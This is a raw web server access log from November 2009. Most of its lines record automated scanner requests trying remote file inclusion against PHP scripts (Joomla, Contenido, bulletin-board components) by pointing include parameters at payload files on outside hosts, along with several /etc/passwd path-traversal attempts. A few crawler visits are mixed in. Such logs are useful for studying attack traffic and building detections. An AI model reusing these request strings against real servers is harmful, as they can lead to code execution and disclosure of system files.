66.34.10.1 - - [11/Nov/2009:21:52:33 -0600] "GET /logs/access_log.1248825600//skins/advanced/advanced1.php?pluginpath[0]=http://oxigent.fileave.com/azka.txt?? HTTP/1.0" 404 327 "-""Mozilla/5.0"
66.34.10.1 - - [11/Nov/2009:21:52:47 -0600] "GET /logs/access_log.1249430400//skins/advanced/advanced1.php?pluginpath[0]=http://oxigent.fileave.com/azka.txt?? HTTP/1.0" 404 327 "-""Mozilla/5.0"
157.100.230.82 - - [11/Nov/2009:21:53:11 -0600] "GET /db.php?path_local=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 289 "-""Mozilla/5.0"
157.100.230.82 - - [11/Nov/2009:21:53:11 -0600] "GET /logs/db.php?path_local=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
157.100.230.82 - - [11/Nov/2009:21:53:11 -0600] "GET /logs/access_log.1253491200/db.php?path_local=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
157.100.230.82 - - [11/Nov/2009:21:53:11 -0600] "GET /logs/access_log.1252454400/db.php?path_local=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
85.214.74.222 - - [11/Nov/2009:21:53:18 -0600] "GET /logs/access_log.1252540800/home.php?pagina=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
85.214.74.222 - - [11/Nov/2009:21:53:18 -0600] "GET /home.php?pagina=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
85.214.74.222 - - [11/Nov/2009:21:53:19 -0600] "GET /logs/home.php?pagina=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
85.214.74.222 - - [11/Nov/2009:21:53:20 -0600] "GET /logs/access_log.1252886400/home.php?pagina=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
152.114.1.50 - - [11/Nov/2009:21:54:21 -0600] "GET ///?_SERVER[DOCUMENT_ROOT]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
152.114.1.50 - - [11/Nov/2009:21:54:21 -0600] "GET /logs/access_log.1235692800///?_SERVER[DOCUMENT_ROOT]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
152.114.1.50 - - [11/Nov/2009:21:54:21 -0600] "GET /logs/access_log.1241568000///?_SERVER[DOCUMENT_ROOT]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
152.114.1.50 - - [11/Nov/2009:21:54:23 -0600] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 200 212472 "-""Mozilla/5.0"
66.249.65.177 - - [11/Nov/2009:21:54:33 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.177 - - [11/Nov/2009:21:54:34 -0600] "GET /logs/access_log.1247011200 HTTP/1.1" 200 734695 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.97.212.185 - - [11/Nov/2009:21:56:32 -0600] "GET /?contenido.php?sec=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
209.97.212.185 - - [11/Nov/2009:21:56:32 -0600] "GET /logs/access_log.1253923200/?contenido.php?sec=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
209.97.212.185 - - [11/Nov/2009:21:56:32 -0600] "GET /logs/access_log.1252800000/?contenido.php?sec=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
209.97.212.185 - - [11/Nov/2009:21:56:33 -0600] "GET /logs/?contenido.php?sec=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 200 212466 "-""Mozilla/5.0"
213.79.101.98 - - [11/Nov/2009:21:57:09 -0600] "GET /logs/access_log.1231718400/error.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
213.79.101.98 - - [11/Nov/2009:21:57:09 -0600] "GET /error.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
213.79.101.98 - - [11/Nov/2009:21:57:09 -0600] "GET /logs/error.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
209.97.212.185 - - [11/Nov/2009:21:57:39 -0600] "GET /logs/access_log.1253232000/?contenido.php?sec=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
213.79.101.98 - - [11/Nov/2009:21:57:43 -0600] "GET /logs/access_log.1240790400/error.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
82.194.87.83 - - [11/Nov/2009:21:57:56 -0600] "GET /?contenido.php?sec=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
82.194.87.83 - - [11/Nov/2009:21:57:56 -0600] "GET /logs/access_log.1253232000/?contenido.php?sec=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
82.194.87.83 - - [11/Nov/2009:21:57:56 -0600] "GET /logs/access_log.1252800000/?contenido.php?sec=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
82.194.87.83 - - [11/Nov/2009:21:57:58 -0600] "GET /logs/?contenido.php?sec=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 200 212466 "-""Mozilla/5.0"
82.194.87.83 - - [11/Nov/2009:21:58:31 -0600] "GET /logs/access_log.1253923200/?contenido.php?sec=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
190.95.231.98 - - [11/Nov/2009:21:58:34 -0600] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
65.55.106.112 - - [11/Nov/2009:21:59:26 -0600] "GET /logs/access_log.1191888000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
190.95.231.98 - - [11/Nov/2009:21:59:31 -0600] "GET /db.php?path_local=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 289 "-""Mozilla/5.0"
190.95.231.98 - - [11/Nov/2009:21:59:31 -0600] "GET /logs/db.php?path_local=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
190.95.231.98 - - [11/Nov/2009:21:59:31 -0600] "GET /logs/access_log.1253491200/db.php?path_local=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
190.95.231.98 - - [11/Nov/2009:21:59:32 -0600] "GET /logs/access_log.1252454400/db.php?path_local=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
85.214.74.222 - - [11/Nov/2009:21:59:48 -0600] "GET /logs/access_log.1249862400/?template=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
85.214.74.222 - - [11/Nov/2009:21:59:48 -0600] "GET /logs/access_log.1247097600/?template=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
85.214.74.222 - - [11/Nov/2009:21:59:48 -0600] "GET /?template=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
85.214.74.222 - - [11/Nov/2009:21:59:50 -0600] "GET /logs/?template=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 212466 "-""Mozilla/5.0"
85.214.74.222 - - [11/Nov/2009:22:00:06 -0600] "GET /logs/access_log.1254009600/?template=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
67.227.134.140 - - [11/Nov/2009:22:00:25 -0600] "GET ///modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.tioplus.com/zeroboard/x1.gif??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
67.227.134.140 - - [11/Nov/2009:22:00:25 -0600] "GET /logs///modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.tioplus.com/zeroboard/x1.gif??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
67.227.134.140 - - [11/Nov/2009:22:00:25 -0600] "GET /logs/access_log.1245628800///modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.tioplus.com/zeroboard/x1.gif??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
65.55.51.112 - - [11/Nov/2009:22:00:51 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.213.177.58 - - [11/Nov/2009:22:01:09 -0600] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.spotmerkezi.com/cache/idv6.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
74.213.177.58 - - [11/Nov/2009:22:01:09 -0600] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.spotmerkezi.com/cache/idv6.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
65.55.51.112 - - [11/Nov/2009:22:01:26 -0600] "GET /logs/access_log.1182384000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
157.100.230.82 - - [11/Nov/2009:22:01:46 -0600] "GET /logs//include/bbs.lib.inc.php?site_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
157.100.230.82 - - [11/Nov/2009:22:01:46 -0600] "GET /logs/access_log.1233705600//include/bbs.lib.inc.php?site_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
190.95.231.98 - - [11/Nov/2009:22:03:44 -0600] "GET /logs/access_log.1252540800/home.php?pagina=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
190.95.231.98 - - [11/Nov/2009:22:03:44 -0600] "GET /logs/access_log.1252886400/home.php?pagina=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
190.95.231.98 - - [11/Nov/2009:22:03:44 -0600] "GET /home.php?pagina=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
190.95.231.98 - - [11/Nov/2009:22:03:44 -0600] "GET /logs/home.php?pagina=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
62.103.31.24 - - [11/Nov/2009:22:04:39 -0600] "GET /logs/access_log.1253491200/db.php?path_local=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
62.103.31.24 - - [11/Nov/2009:22:04:39 -0600] "GET /db.php?path_local=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 289 "-""Mozilla/5.0"
62.103.31.24 - - [11/Nov/2009:22:04:42 -0600] "GET /logs/db.php?path_local=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
62.103.31.24 - - [11/Nov/2009:22:04:46 -0600] "GET /logs/access_log.1252454400/db.php?path_local=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
157.100.230.82 - - [11/Nov/2009:22:05:45 -0600] "GET /?template=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
157.100.230.82 - - [11/Nov/2009:22:05:45 -0600] "GET /logs/access_log.1249862400/?template=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
157.100.230.82 - - [11/Nov/2009:22:05:45 -0600] "GET /logs/access_log.1247097600/?template=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
157.100.230.82 - - [11/Nov/2009:22:05:53 -0600] "GET /logs/?template=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 212466 "-""Mozilla/5.0"
157.100.230.82 - - [11/Nov/2009:22:06:05 -0600] "GET /logs/access_log.1254009600/?template=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
190.95.231.98 - - [11/Nov/2009:22:07:57 -0600] "GET /logs/access_log.1249862400/?template=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
190.95.231.98 - - [11/Nov/2009:22:07:57 -0600] "GET /?template=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
190.95.231.98 - - [11/Nov/2009:22:07:57 -0600] "GET /logs/access_log.1247097600/?template=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
157.100.230.82 - - [11/Nov/2009:22:08:12 -0600] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
190.95.231.98 - - [11/Nov/2009:22:08:13 -0600] "GET /logs/?template=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 212466 "-""Mozilla/5.0"
66.249.65.177 - - [11/Nov/2009:22:08:13 -0600] "GET /logs/access_log.1246320000 HTTP/1.1" 200 476784 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
174.123.165.226 - - [11/Nov/2009:22:08:37 -0600] "GET /?pm_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 200 3245 "-""-"
174.123.165.226 - - [11/Nov/2009:22:08:38 -0600] "GET /?pm_path=./../../../../../../../../etc/passwd HTTP/1.1" 200 3245 "-""-"
81.176.229.7 - - [11/Nov/2009:22:08:39 -0600] "GET //skin/sirini_8200/ezset.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/fx29id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
81.176.229.7 - - [11/Nov/2009:22:08:39 -0600] "GET /logs//skin/sirini_8200/ezset.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/fx29id1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
81.176.229.7 - - [11/Nov/2009:22:08:39 -0600] "GET /logs/access_log.1250294400//skin/sirini_8200/ezset.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/fx29id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
190.95.231.98 - - [11/Nov/2009:22:08:41 -0600] "GET /logs/access_log.1254009600/?template=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
81.176.229.7 - - [11/Nov/2009:22:08:48 -0600] "GET /logs/access_log.1253577600//skin/sirini_8200/ezset.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/fx29id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
118.220.173.228 - - [11/Nov/2009:22:11:28 -0600] "GET /logs//send_reminders.php?includedir=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
118.220.173.228 - - [11/Nov/2009:22:11:28 -0600] "GET //send_reminders.php?includedir=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
118.220.173.228 - - [11/Nov/2009:22:11:28 -0600] "GET /logs/access_log.1230768000//send_reminders.php?includedir=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
118.220.173.228 - - [11/Nov/2009:22:11:59 -0600] "GET /logs/access_log.1229299200//send_reminders.php?includedir=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
118.220.173.228 - - [11/Nov/2009:22:12:12 -0600] "GET //send_reminders.php?includedir=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
118.220.173.228 - - [11/Nov/2009:22:12:12 -0600] "GET /logs//send_reminders.php?includedir=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
118.220.173.228 - - [11/Nov/2009:22:12:12 -0600] "GET /logs/access_log.1230768000//send_reminders.php?includedir=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
118.220.173.228 - - [11/Nov/2009:22:12:22 -0600] "GET /logs/access_log.1229299200//send_reminders.php?includedir=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
91.137.0.63 - - [11/Nov/2009:22:12:48 -0600] "GET //includes/header.php?c_temp_path=http://www.nopaste.pl/Source/hbb.txt?&mode=id HTTP/1.1" 404 303 "-""-"
89.171.190.107 - - [11/Nov/2009:22:12:59 -0600] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
89.171.190.107 - - [11/Nov/2009:22:13:02 -0600] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
89.171.190.107 - - [11/Nov/2009:22:13:04 -0600] "GET /logs/access_log.1230163200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
89.171.190.107 - - [11/Nov/2009:22:13:10 -0600] "GET /logs/access_log.1230076800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
87.139.66.104 - - [11/Nov/2009:22:13:20 -0600] "GET //common/db.php?commonpath=http://www.lan51.fr/Portail/tp-images/a.gif?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
87.139.66.104 - - [11/Nov/2009:22:13:20 -0600] "GET /logs/access_log.1251244800//common/db.php?commonpath=http://www.lan51.fr/Portail/tp-images/a.gif?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
87.139.66.104 - - [11/Nov/2009:22:13:20 -0600] "GET /logs//common/db.php?commonpath=http://www.lan51.fr/Portail/tp-images/a.gif?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
89.171.190.107 - - [11/Nov/2009:22:13:52 -0600] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
89.171.190.107 - - [11/Nov/2009:22:13:53 -0600] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
89.171.190.107 - - [11/Nov/2009:22:13:54 -0600] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
89.171.190.107 - - [11/Nov/2009:22:13:55 -0600] "GET /logs/access_log.1230163200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
89.171.190.107 - - [11/Nov/2009:22:13:56 -0600] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
89.171.190.107 - - [11/Nov/2009:22:13:58 -0600] "GET /logs/access_log.1230163200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
89.171.190.107 - - [11/Nov/2009:22:14:10 -0600] "GET /logs/access_log.1230163200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
89.171.190.107 - - [11/Nov/2009:22:14:10 -0600] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
89.171.190.107 - - [11/Nov/2009:22:14:17 -0600] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
89.171.190.107 - - [11/Nov/2009:22:14:24 -0600] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
89.171.190.107 - - [11/Nov/2009:22:14:24 -0600] "GET /logs/access_log.1230076800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
89.171.190.107 - - [11/Nov/2009:22:14:27 -0600] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
89.171.190.107 - - [11/Nov/2009:22:14:28 -0600] "GET /logs/access_log.1230163200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
89.171.190.107 - - [11/Nov/2009:22:14:39 -0600] "GET /logs/access_log.1230076800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
89.171.190.107 - - [11/Nov/2009:22:14:42 -0600] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
89.171.190.107 - - [11/Nov/2009:22:14:43 -0600] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
89.171.190.107 - - [11/Nov/2009:22:14:46 -0600] "GET /logs/access_log.1230163200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
89.171.190.107 - - [11/Nov/2009:22:14:55 -0600] "GET /logs/access_log.1230076800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
89.171.190.107 - - [11/Nov/2009:22:15:02 -0600] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
89.171.190.107 - - [11/Nov/2009:22:15:03 -0600] "GET /logs/access_log.1230163200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
89.171.190.107 - - [11/Nov/2009:22:15:03 -0600] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
89.171.190.107 - - [11/Nov/2009:22:15:05 -0600] "GET /logs/access_log.1230076800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
89.171.190.107 - - [11/Nov/2009:22:15:24 -0600] "GET /logs/access_log.1230076800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
89.171.190.107 - - [11/Nov/2009:22:15:30 -0600] "GET /logs/access_log.1230076800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
65.55.106.187 - - [11/Nov/2009:22:19:26 -0600] "GET /logs/access_log.1177286400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.29.90.110 - - [11/Nov/2009:22:20:31 -0600] "GET /logs/access_log.1234051200//bbs//include/bbs.lib.inc.php?site_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
200.29.90.110 - - [11/Nov/2009:22:20:31 -0600] "GET /logs//bbs//include/bbs.lib.inc.php?site_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
200.29.90.110 - - [11/Nov/2009:22:20:31 -0600] "GET /logs/access_log.1248220800//bbs//include/bbs.lib.inc.php?site_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
200.29.90.110 - - [11/Nov/2009:22:20:38 -0600] "GET /logs//bbs//include/bbs.lib.inc.php?site_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
200.29.90.110 - - [11/Nov/2009:22:20:38 -0600] "GET /logs/access_log.1248220800//bbs//include/bbs.lib.inc.php?site_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
200.29.90.110 - - [11/Nov/2009:22:20:38 -0600] "GET /logs/access_log.1234051200//bbs//include/bbs.lib.inc.php?site_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
91.121.28.22 - - [11/Nov/2009:22:21:57 -0600] "GET /logs//index.php?c=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""-"
91.121.28.22 - - [11/Nov/2009:22:21:57 -0600] "GET //index.php?c=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""-"
91.121.28.22 - - [11/Nov/2009:22:21:58 -0600] "GET /logs//index.php?c=./../../../../../../../../etc/passwd HTTP/1.1" 404 298 "-""-"
91.121.28.22 - - [11/Nov/2009:22:21:58 -0600] "GET //index.php?c=./../../../../../../../../etc/passwd HTTP/1.1" 404 293 "-""-"
66.249.65.177 - - [11/Nov/2009:22:23:30 -0600] "GET /logs/access_log.1236124800 HTTP/1.1" 200 251288 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
91.121.28.22 - - [11/Nov/2009:22:23:40 -0600] "GET /logs/access_log.1228608000%20//index.php?c=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""-"
91.121.28.22 - - [11/Nov/2009:22:23:40 -0600] "GET /logs/access_log.1228608000%20//index.php?c=./../../../../../../../../etc/passwd HTTP/1.1" 404 321 "-""-"
65.55.207.126 - - [11/Nov/2009:22:24:25 -0600] "GET /logs/access_log.1193875200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
150.101.220.114 - - [11/Nov/2009:22:30:30 -0600] "GET /logs/xmlrpc.php HTTP/1.1" 404 298 "-""-"
150.101.220.114 - - [11/Nov/2009:22:30:31 -0600] "GET /xmlrpc.php HTTP/1.1" 404 293 "-""-"
66.163.197.88 - - [11/Nov/2009:22:31:58 -0600] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
66.163.197.88 - - [11/Nov/2009:22:31:58 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
66.163.197.88 - - [11/Nov/2009:22:31:59 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
91.137.0.63 - - [11/Nov/2009:22:32:04 -0600] "GET /logs//includes/header.php?c_temp_path=http://www.nopaste.pl/Source/hbb.txt?&mode=id HTTP/1.1" 404 308 "-""-"
66.163.197.88 - - [11/Nov/2009:22:32:18 -0600] "GET /logs/access_log.1235779200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
213.3.26.176 - - [11/Nov/2009:22:36:02 -0600] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
213.3.26.176 - - [11/Nov/2009:22:36:16 -0600] "GET /logs/access_log.1254009600/e404.php?DOCUMENT_ROOT=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
